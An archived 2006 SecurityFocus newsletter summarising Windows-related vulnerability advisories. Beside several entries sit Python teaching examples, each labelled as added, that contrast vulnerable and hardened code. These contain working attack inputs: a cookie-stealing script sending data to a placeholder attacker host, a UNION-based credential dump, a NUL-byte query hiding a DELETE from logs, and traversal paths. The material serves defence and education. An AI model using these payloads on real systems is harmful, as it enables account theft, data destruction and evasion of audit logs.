SecurityFocus Microsoft Newsletter #281
----------------------------------------

This Issue is Sponsored By: Cambia

Automate IT security compliance now!
FREE White Paper demonstrates how you can reduce time spent on IT policy compliance by as much as 90%, while improving your security posture. Cambia's agentless software continuously discovers all changes to network assets, intelligently determines which changes pose a risk to security and compliance and works with administrators to fix breaches quickly.

http://a.gklmedia.com/sfmn/nl/125

------------------------------------------------------------------
I. FRONT AND CENTER
1. The big DRM mistake
2. The value of vulnerabilities
II. MICROSOFT VULNERABILITY SUMMARY
1. Microsoft Internet Explorer Java Applet Handling Denial of Service Vulnerability
2. Microsoft Visual Studio DBP and SLN Files DataProject Buffer Overflow Vulnerability
3. AVG Anti-Virus Local Insecure Permissions Vulnerability
4. Van Dyke SecureCRT and SecureFX Buffer Overflow Vulnerability
5. RaidenHTTPD Remote Script Disclosure Vulnerability
6. EMC Dantz Retrospect Backup Client Remote Denial of Service Vulnerability
7. VBulletin Profile.PHP Email Field HTML Injection Vulnerability
8. LetterMerger Local Information Disclosure Vulnerability
9. NCP Secure Client Multiple Vulnerabilities
10. NetworkActiv Web Server Remote Script Disclosure Vulnerability
11. OpenSSH Remote PAM Denial Of Service Vulnerability
12. HP System Management Homepage Unspecified Directory Traversal Vulnerability
13. Microsoft Internet Explorer IsComponentInstalled Buffer Overflow Vulnerability
14. Alt-N MDaemon IMAP Server Remote Format String Vulnerability
15. MySQL Query Logging Bypass Vulnerability
16. iCal Calendar Text Cross-Site Scripting Vulnerability
17. MTS Professional Open EMail Relay Vulnerability
18. ArGoSoft Mail Server Pro Multiple HTML Injection Vulnerabilities
19. PHPWebSite Topics.PHP SQL Injection Vulnerability
III. MICROSOFT FOCUS LIST SUMMARY
1. Administrivia: Holidays
2. Questions regarding EFS
3. programming Aeronet card for authentication and configuration in embedded XP
4. SecurityFocus Microsoft Newsletter #280
IV. UNSUBSCRIBE INSTRUCTIONS
V. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1. The big DRM mistake
By Scott Granneman
Digital Rights Management hurts paying customers, destroys Fair Use rights, renders customers' investments worthless, and can always be defeated. Why are consumers and publishers being forced to use DRM?
http://www.securityfocus.com/columnists/390

2. The value of vulnerabilities
By Jason Miller
There is value in finding vulnerabilities. Yet many people believe that a vulnerability doesn't exist until it is disclosed to the public. We know that vulnerabilities need to be disclosed, but what role do vendors have to make these issues public?
http://www.securityfocus.com/columnists/391


II. MICROSOFT VULNERABILITY SUMMARY
------------------------------------
1. Microsoft Internet Explorer Java Applet Handling Denial of Service Vulnerability
BugTraq ID: 16978
Remote: Yes
Date Published: 2006-03-06
Relevant URL: http://www.securityfocus.com/bid/16978
Summary:
Microsoft Internet Explorer is affected by a denial-of-service vulnerability because the application fails to handle an exceptional condition properly. The issue presents itself only when Sun's Java Runtime Environment is installed and configured as the default handler for Java applets.

An attacker may exploit this issue by enticing a user to visit a malicious site resulting in a denial of service condition in the application.

Specific version information for Microsoft Internet Explorer and the Java runtime is not currently available. This BID will be updated as further information is disclosed.

2. Microsoft Visual Studio DBP and SLN Files DataProject Buffer Overflow Vulnerability
BugTraq ID: 16953
Remote: Yes
Date Published: 2006-03-04
Relevant URL: http://www.securityfocus.com/bid/16953
Summary:
Microsoft Visual Studio is prone to a buffer-overflow vulnerability. This issue is due to a failure of the application to properly bounds-check user-supplied data prior to copying it to an insufficiently sized memory buffer.

This issue allows attackers to execute arbitrary code in the context of the user viewing a malicious file. As viewing a project file is usually considered to be a safe operation, users may have a false sense of security by attempting to inspect unknown code prior to compiling or executing it.

This vulnerability can be exploited remotely because project files frequently originate from untrusted sources.

Visual Studio 6 is reportedly vulnerable to this issue; other versions may also be affected.

3. AVG Anti-Virus Local Insecure Permissions Vulnerability
BugTraq ID: 16952
Remote: No
Date Published: 2006-03-04
Relevant URL: http://www.securityfocus.com/bid/16952
Summary:
AVG Anti-Virus is prone to a local insecure permissions vulnerability. This issue is due to the application incorrectly resetting the permissions on critical files during its periodic update process.

A local, unprivileged attacker can exploit this issue to replace critical driver files with malicious executables. This may facilitate a complete compromise of the affected computer.

This issue affects AVG version 7. Other versions may also be vulnerable.

4. Van Dyke SecureCRT and SecureFX Buffer Overflow Vulnerability
BugTraq ID: 16935
Remote: Yes
Date Published: 2006-03-03
Relevant URL: http://www.securityfocus.com/bid/16935
Summary:
Van Dyke SecureCRT and SecureFX are prone to a buffer-overflow vulnerability when converting Unicode strings. An attacker could potentially exploit this to execute arbitrary code or cause a denial of service.

SecureCRT versions 5.0.4 and earlier are affected. SecureFX versions 3.0.4 and earlier are affected.

5. RaidenHTTPD Remote Script Disclosure Vulnerability
BugTraq ID: 16934
Remote: Yes
Date Published: 2006-03-03
Relevant URL: http://www.securityfocus.com/bid/16934
Summary:
RaidenHTTPD is prone to an information disclosure vulnerability.

The source code of script files may be obtained by an attacker.

Scripts may contain sensitive information that may be used to aid in further attacks launched against the target computer.

RaidenHTTPD versions prior to 1.1.48 are vulnerable.

6. EMC Dantz Retrospect Backup Client Remote Denial of Service Vulnerability
BugTraq ID: 16933
Remote: Yes
Date Published: 2006-03-03
Relevant URL: http://www.securityfocus.com/bid/16933
Summary:
Dantz Retrospect Backup Client is prone to a remote denial of service vulnerability. An unauthenticated, remote attacker can cause the client to fail.

This issue has been addressed in Retrospect Backup Client 6.5.138 and 7.0.109; earlier versions are vulnerable. The Apple Retrospect Backup Client is reportedly not affected.

7. VBulletin Profile.PHP Email Field HTML Injection Vulnerability
BugTraq ID: 16919
Remote: Yes
Date Published: 2006-03-02
Relevant URL: http://www.securityfocus.com/bid/16919
Summary:
vBulletin is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing for the theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

This issue is reported to affect vBulletin versions 3.0.12 through 3.5.3. Other versions may also be affected.

8. LetterMerger Local Information Disclosure Vulnerability
BugTraq ID: 16917
Remote: No
Date Published: 2006-03-02
Relevant URL: http://www.securityfocus.com/bid/16917
Summary:
LetterMerger is prone to a local information-disclosure vulnerability. This issue exists because the application stores data with insecure permissions in a Microsoft Access database.

LetterMerger 1.2 is vulnerable; other versions may also be affected.

9. NCP Secure Client Multiple Vulnerabilities
BugTraq ID: 16906
Remote: Yes
Date Published: 2006-03-01
Relevant URL: http://www.securityfocus.com/bid/16906
Summary:
NCP Secure Client is susceptible to multiple vulnerabilities.

The following issues have been identified:
- Firewall rules designed to allow only specific applications to access the network may be bypassed.
- Some applications are prone to local command-line-argument buffer-overflow vulnerabilities.
- The VPN client is susceptible to a remote denial-of-service vulnerability.
- The VPN client is susceptible to a local privilege-escalation vulnerability.

These issues allow local attackers to gain SYSTEM-level privileges, allowing them to completely compromise affected computers. Remote attackers may consume excessive CPU resources, denying service to legitimate users.

NCP Secure Client version 8.11 Build 146 on the Microsoft Windows platform is vulnerable to these issues; other versions may also be affected.

10. NetworkActiv Web Server Remote Script Disclosure Vulnerability
BugTraq ID: 16895
Remote: Yes
Date Published: 2006-03-01
Relevant URL: http://www.securityfocus.com/bid/16895
Summary:
NetworkActiv Web Server is prone to an information-disclosure vulnerability. An attacker may obtain the source code of script files.

Scripts may contain sensitive information that may aid in further attacks launched against the target computer.

NetworkActiv Web Server versions prior to 3.5.16 are vulnerable.

11. OpenSSH Remote PAM Denial Of Service Vulnerability
BugTraq ID: 16892
Remote: Yes
Date Published: 2006-03-01
Relevant URL: http://www.securityfocus.com/bid/16892
Summary:
OpenSSH is susceptible to a remote denial-of-service vulnerability. This issue is due to a design flaw in the handling of connections when OpenSSH is configured to use the OpenPAM authentication system.

This issue may be exploited by remote attackers to deny SSH service to legitimate users.

OpenSSH in conjunction with OpenPAM on FreeBSD versions 5.3 and 5.4 is affected by this issue. Other operating systems and versions may also be affected.

12. HP System Management Homepage Unspecified Directory Traversal Vulnerability
BugTraq ID: 16876
Remote: Yes
Date Published: 2006-02-28
Relevant URL: http://www.securityfocus.com/bid/16876
Summary:
HP System Management Homepage (SMH) is prone to an unspecified directory-traversal vulnerability. This issue is most likely due to a failure in the application to properly sanitize user-supplied input.

Presumably, an attacker can exploit this issue to retrieve arbitrary files in the context of the affected application. This issue may also permit the overwriting of arbitrary files.

The exact nature of this vulnerability is not currently known; this BID will be updated as further information becomes available.

This issue affects HP SMH only on the Microsoft Windows platform.

This issue is likely similar to the one described in BID 16571 (HP Systems Insight Manager Unspecified Directory Traversal Vulnerability), possibly due to code reuse among products.
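The traversal pattern behind the two HP advisories above, as an added example that is not HP's code: a request path joined onto a web root without a containment check, next to a canonicalising check that refuses anything outside the root. It assumes the server maps request paths onto a directory with os.path.join(); the directory tree, file names and contents are constructed for the demonstration.

```python
"""Added example, not HP's code: the traversal pattern behind BID 16876 and
BID 16571, with a web-root check that closes it.

Assumptions: the server maps a request path onto a directory ("web root")
with os.path.join(); file names and contents below are constructed."""
import os
import tempfile


def read_vulnerable(webroot: str, requested: str) -> str:
    # os.path.join() follows '..' segments and, for an absolute 'requested',
    # discards webroot entirely, so the result is not confined to webroot.
    with open(os.path.join(webroot, requested), encoding="utf-8") as fh:
        return fh.read()


def resolve_safely(webroot: str, requested: str) -> str:
    """Canonicalise both sides (symlinks, '..', '.') and require the target to
    lie under the web root. Raises PermissionError otherwise."""
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"path escapes web root: {requested!r}")
    return target


def read_hardened(webroot: str, requested: str) -> str:
    with open(resolve_safely(webroot, requested), encoding="utf-8") as fh:
        return fh.read()


def demo() -> dict:
    """Builds a throwaway tree: <tmp>/htdocs/index.html is served, while
    <tmp>/secret.conf sits one level above the web root."""
    root = tempfile.mkdtemp()
    webroot = os.path.join(root, "htdocs")
    os.makedirs(webroot)
    with open(os.path.join(webroot, "index.html"), "w", encoding="utf-8") as fh:
        fh.write("<h1>ok</h1>")
    secret = os.path.join(root, "secret.conf")
    with open(secret, "w", encoding="utf-8") as fh:
        fh.write("db_password=constructed-sample")

    results = {"normal": read_hardened(webroot, "index.html")}
    # Two traversal shapes: a relative '..' escape and an absolute path.
    results["dotdot_vulnerable"] = read_vulnerable(webroot, "../secret.conf")
    results["absolute_vulnerable"] = read_vulnerable(webroot, secret)
    for label, path in (("dotdot_hardened", "../secret.conf"),
                        ("absolute_hardened", secret)):
        try:
            read_hardened(webroot, path)
            results[label] = "served"
        except PermissionError:
            results[label] = "blocked"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:20s} {value}")
```

The check compares canonical paths rather than looking for ".." in the request string, so encoded or alternate separators and symlinks inside the web root are handled the same way the filesystem handles them. The same resolve_safely() guard applies to writes, which is the overwrite case the advisory mentions.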

13. Microsoft Internet Explorer IsComponentInstalled Buffer Overflow Vulnerability
BugTraq ID: 16870
Remote: Yes
Date Published: 2006-02-28
Relevant URL: http://www.securityfocus.com/bid/16870
Summary:
Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser.

This issue was reportedly addressed in Windows 2000 SP4 and Windows XP SP1, but this has not been confirmed.

Internet Explorer 6 is vulnerable to this issue; earlier versions may also be affected.

14. Alt-N MDaemon IMAP Server Remote Format String Vulnerability
BugTraq ID: 16854
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16854
Summary:
Alt-N MDaemon IMAP Server is affected by a remote format-string vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input before using it in the format-specifier argument to a formatted printing function.

This vulnerability may be leveraged to consume excessive CPU resources or to crash the service. Due to the nature of this issue, remote code execution is likely possible, although this has not been confirmed.

Alt-N MDaemon 8.1.1 is reported to be vulnerable. Other versions are likely affected as well.

15. MySQL Query Logging Bypass Vulnerability
BugTraq ID: 16850
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16850
Summary:
MySQL is susceptible to a query-logging-bypass vulnerability. This issue is due to a discrepancy in how NUL bytes in a query are handled: the server executes the full query as sent, while the logging code treats the NUL byte as the end of the string, so the logged entry is truncated at that point.

This issue allows attackers to bypass the query-logging functionality of the database and cause malicious SQL queries to be logged incompletely. This may help them hide traces of malicious activity from administrators.

This issue affects MySQL version 5.0.18; other versions may also be affected.
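The mechanism behind the bypass, as an added example that is not MySQL's code: a length-aware parser runs the whole query, while a logger written around C strings stops at the first NUL byte. SQLite stands in for the server, a regex stands in for the comment parser, and the query and table are constructed; a logger that writes the buffer by length and makes NUL visible is shown alongside.

```python
"""Added example, not MySQL's code: why a NUL byte lets a query past a logger
written around C strings, and a logger that records the whole buffer.

Assumptions: the server parses the query by length (NUL inside a comment is
just a byte), while the log path stops at the first NUL, as strlen()/"%s"
would. SQLite stands in for the server; the query and table are constructed."""
import re
import sqlite3


def sql_as_executed(query: bytes) -> str:
    """Length-aware parser stand-in: strips /* ... */ comments, NUL included,
    and returns the statement the server actually runs."""
    return re.sub(rb"/\*.*?\*/", b"", query, flags=re.S).decode("latin-1").strip()


def log_c_string(query: bytes) -> str:
    """Logger modelled on a C strlen()/%s path: the entry ends at the first NUL."""
    return query.split(b"\x00", 1)[0].decode("latin-1")


def log_length_aware(query: bytes) -> str:
    """Hardened logger: writes the buffer by its length and makes NUL visible."""
    return query.decode("latin-1").replace("\x00", "\\0")


def run(query: bytes) -> tuple:
    """Returns (C-string log entry, length-aware log entry, rows left)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE audit(id INTEGER, event TEXT)")
    conn.executemany("INSERT INTO audit VALUES (?, ?)",
                     [(1, "login"), (2, "logout")])
    conn.execute(sql_as_executed(query))
    rows_left = conn.execute("SELECT COUNT(*) FROM audit").fetchone()[0]
    return log_c_string(query), log_length_aware(query), rows_left


# Constructed attacker query: NUL inside a comment keeps the SQL valid while
# a strlen-based logger records only the innocuous prefix.
ATTACK = b"/* routine check \x00 */ DELETE FROM audit"

if __name__ == "__main__":
    weak, strong, left = run(ATTACK)
    print("C-string log entry :", repr(weak))
    print("length-aware entry :", repr(strong))
    print("rows left in audit :", left)
```

When reviewing query logs from a server of this vintage, an entry that ends in an unterminated comment or mid-token is worth treating as a possible truncation rather than a harmless fragment.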

16. iCal Calendar Text Cross-Site Scripting Vulnerability
BugTraq ID: 16845
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16845
Summary:
iCal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

17. MTS Professional Open EMail Relay Vulnerability
BugTraq ID: 16840
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16840
Summary:
MTS Professional is susceptible to a remote open-email-relay vulnerability. This issue is due to the application's failure to properly verify the origin of a message before relaying it to a non-local recipient.

This issue allows remote attackers to use vulnerable servers to send arbitrary unsolicited bulk email. Attackers may also forge email messages that appear to originate from a trusted mail server.
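The relay decision at RCPT TO, as an added example that is not MTS Professional's code: the envelope phase of an SMTP dialogue replayed against a policy that trusts the claimed sender (the class of mistake described above) and against one that only relays on facts the client cannot forge. It assumes example.com is the server's sole local domain and 192.0.2.0/24 its trusted LAN; client addresses and mailboxes are constructed.

```python
"""Added example, not MTS Professional's code: the relay decision an SMTP
server makes at RCPT TO, in the form the advisory describes (trusting the
claimed sender) next to a form based on facts the client cannot forge.

Assumptions: example.com is the server's only local domain, 192.0.2.0/24 is
the trusted LAN, and the client addresses are constructed."""
import ipaddress

LOCAL_DOMAINS = {"example.com"}
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower()


def rcpt_vulnerable(client_ip: str, authenticated: bool,
                    mail_from: str, rcpt_to: str) -> str:
    """Open relay: a non-local recipient is accepted whenever MAIL FROM claims
    a local domain. The envelope sender is attacker-supplied, so this is a
    check the attacker passes by typing it."""
    if domain_of(rcpt_to) in LOCAL_DOMAINS:
        return "250 2.1.5 OK"
    if domain_of(mail_from) in LOCAL_DOMAINS:
        return "250 2.1.5 OK"
    return "550 5.7.1 Relaying denied"


def rcpt_hardened(client_ip: str, authenticated: bool,
                  mail_from: str, rcpt_to: str) -> str:
    """Relay for non-local recipients only if the client authenticated or
    connects from a trusted network; the envelope sender is not consulted."""
    if domain_of(rcpt_to) in LOCAL_DOMAINS:
        return "250 2.1.5 OK"
    ip = ipaddress.ip_address(client_ip)
    if authenticated or any(ip in net for net in TRUSTED_NETS):
        return "250 2.1.5 OK"
    return "550 5.7.1 Relaying denied"


def envelope_session(policy, client_ip, authenticated, mail_from, rcpt_to):
    """Replays the envelope phase of an SMTP dialogue against a policy and
    returns (transcript lines, whether the relay attempt was accepted)."""
    lines = [
        "S: 220 mail.example.com ESMTP",
        "C: EHLO attacker.invalid",
        "S: 250 mail.example.com",
        f"C: MAIL FROM:<{mail_from}>",
        "S: 250 2.1.0 OK",
        f"C: RCPT TO:<{rcpt_to}>",
    ]
    reply = policy(client_ip, authenticated, mail_from, rcpt_to)
    lines.append("S: " + reply)
    return lines, reply.startswith("250")


if __name__ == "__main__":
    for policy in (rcpt_vulnerable, rcpt_hardened):
        transcript, relayed = envelope_session(
            policy, "198.51.100.7", False, "ceo@example.com", "victim@other.test")
        print(f"--- {policy.__name__}: relayed={relayed}")
        print("\n".join(transcript))
```

Network-based trust is only as good as the network: if the trusted range contains hosts an outsider can reach (an open proxy, a compromised workstation), SMTP AUTH is the stronger of the two conditions.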

18. ArGoSoft Mail Server Pro Multiple HTML Injection Vulnerabilities
BugTraq ID: 16834
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16834
Summary:
ArGoSoft Mail Server Pro is prone to multiple HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

ArGoSoft Mail Server Pro 1.8.8.5 and prior versions are vulnerable.
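The HTML-injection class shared by the vBulletin profile field (item 7), the iCal calendar text (item 16) and the ArGoSoft entries above, as an added example that is not any of those products' code: a stored profile value rendered without output encoding, the same value encoded for each HTML context, and a parser-based check of which elements the page ends up containing. It assumes the field is an e-mail address shown as both a mailto: link and its link text; the payload is constructed.

```python
"""Added example, not vBulletin's, iCal's or ArGoSoft's code: a profile field
rendered without output encoding, the same field rendered with encoding for
each HTML context, and a parser-based check of what each version produces.

Assumptions: the field is an e-mail address shown both as a mailto: link and
as link text; the payload is constructed."""
import html
import re
from html.parser import HTMLParser

# Constructed attacker value: closes the href attribute, then injects script.
PAYLOAD = ('"><script>document.location="http://attacker.invalid/?c="'
           '+document.cookie</script>')

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def is_plausible_email(value: str) -> bool:
    """Allow-list validation at save time: a first, coarse layer. It is not a
    substitute for output encoding, because other fields are free text."""
    return EMAIL_RE.fullmatch(value) is not None


def render_vulnerable(email: str) -> str:
    # Stored value dropped straight into attribute and text contexts.
    return f'<a href="mailto:{email}">{email}</a>'


def render_hardened(email: str) -> str:
    # quote=True encodes '"' as well, so the value cannot end the attribute;
    # the same escaping covers the text node.
    safe = html.escape(email, quote=True)
    return f'<a href="mailto:{safe}">{safe}</a>'


class _TagCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup: str) -> list:
    """Which elements a browser-like parser would see in the rendered page;
    anything beyond the intended <a> came from the user value."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    print("vulnerable ->", tags_in(render_vulnerable(PAYLOAD)))
    print("hardened   ->", tags_in(render_hardened(PAYLOAD)))
    print("validator  ->", is_plausible_email(PAYLOAD),
          is_plausible_email("user@example.com"))
```

The encoding has to match the context the value lands in: html.escape with quote=True covers text nodes and quoted attributes, but a value placed inside a script block or an unquoted attribute needs a different encoder, and a mailto: URL built from user input should also be URL-validated before it is emitted.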

19. PHPWebSite Topics.PHP SQL Injection Vulnerability
BugTraq ID: 16825
Remote: Yes
Date Published: 2006-02-25
Relevant URL: http://www.securityfocus.com/bid/16825
Summary:
phpWebSite is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
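The injection class described above, as an added example that is not phpWebSite's code: a topic lookup that builds its statement by concatenation, the payload that turns it into a credential dump, and the parameterised lookup that does not. It uses SQLite in memory; the table names, rows and the payload are constructed.

```python
"""Added example, not phpWebSite's code: a topic lookup that builds SQL by
concatenation, the injection that turns it into a credential dump, and the
parameterised lookup that does not. Uses SQLite in memory; table names, rows
and the payload are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE topics(id INTEGER, title TEXT);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO topics VALUES (1, 'Welcome'), (2, 'Announcements');
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return conn


def topic_vulnerable(conn: sqlite3.Connection, topic_id: str) -> list:
    # The request parameter is pasted into the statement text, so it can
    # extend the query with UNION, extra conditions, or anything else.
    sql = "SELECT id, title FROM topics WHERE id = " + topic_id
    return conn.execute(sql).fetchall()


def topic_hardened(conn: sqlite3.Connection, topic_id: str) -> list:
    # Bind the value as a parameter: the driver sends it separately from the
    # SQL text, so it can only ever be compared, never parsed. Type-checking
    # the input first rejects obvious garbage before it reaches the database.
    if not topic_id.isdigit():
        raise ValueError("topic id must be a non-negative integer")
    return conn.execute(
        "SELECT id, title FROM topics WHERE id = ?", (int(topic_id),)
    ).fetchall()


def topic_bound_only(conn: sqlite3.Connection, topic_id: str) -> list:
    # Same query with the parameter bound as a raw string: still safe, the
    # payload just compares unequal to every integer id.
    return conn.execute(
        "SELECT id, title FROM topics WHERE id = ?", (topic_id,)
    ).fetchall()


# Constructed payload for a 'topics.php?id=' style parameter.
PAYLOAD = "0 UNION SELECT username, password FROM users"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", topic_vulnerable(db, PAYLOAD))
    print("bound only:", topic_bound_only(db, PAYLOAD))
    try:
        topic_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened  :", exc)
```

Parameter binding alone is what closes the hole; the type check in topic_hardened() is defence in depth that also gives a clean error instead of a database error for malformed input.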

III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Administrivia: Holidays
http://www.securityfocus.com/archive/88/426709

2. Questions regarding EFS
http://www.securityfocus.com/archive/88/426490

3. programming Aeronet card for authentication and configuration in embedded XP
http://www.securityfocus.com/archive/88/426424

4. SecurityFocus Microsoft Newsletter #280
http://www.securityfocus.com/archive/88/426457

IV. UNSUBSCRIBE INSTRUCTIONS
-----------------------------
To unsubscribe send an e-mail message to ms-secnews-unsubscribe@xxxxxxxxxxxxxxxxx from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.

If your email address has changed email listadmin@xxxxxxxxxxxxxxxxx and ask to be manually removed.

V. SPONSOR INFORMATION
------------------------
This Issue is Sponsored By: Cambia

Automate IT security compliance now!
FREE White Paper demonstrates how you can reduce time spent on IT policy compliance by as much as 90%, while improving your security posture. Cambia's agentless software continuously discovers all changes to network assets, intelligently determines which changes pose a risk to security and compliance and works with administrators to fix breaches quickly.

http://a.gklmedia.com/sfmn/nl/125



